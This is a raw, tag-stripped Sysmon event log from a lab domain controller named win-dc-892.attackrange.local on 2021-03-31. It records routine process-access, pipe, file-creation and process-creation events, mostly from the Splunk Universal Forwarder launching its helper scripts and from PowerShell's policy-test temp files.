12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.408{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.414{266CAFBE-6482-6064-6700-00000000AE01}3748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.346{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.346{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:06.330{266CAFBE-6482-6064-6500-00000000AE01}3228\PSHost.132616656662644168.3228.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.315{266CAFBE-6482-6064-6500-00000000AE01}3228NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_abhoevp0.y1w.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.315{266CAFBE-6482-6064-6500-00000000AE01}3228NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ce2z1y2p.34u.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-6482-6064-6500-00000000AE01}3228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_ce2z1y2p.34u.ps12021-03-31 12:01:06.299 10341000x80000000000000002739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.299{266CAFBE-647D-6064-2F00-00000000AE01}27963792C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:06.307{266CAFBE-6482-6064-6600-00000000AE01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 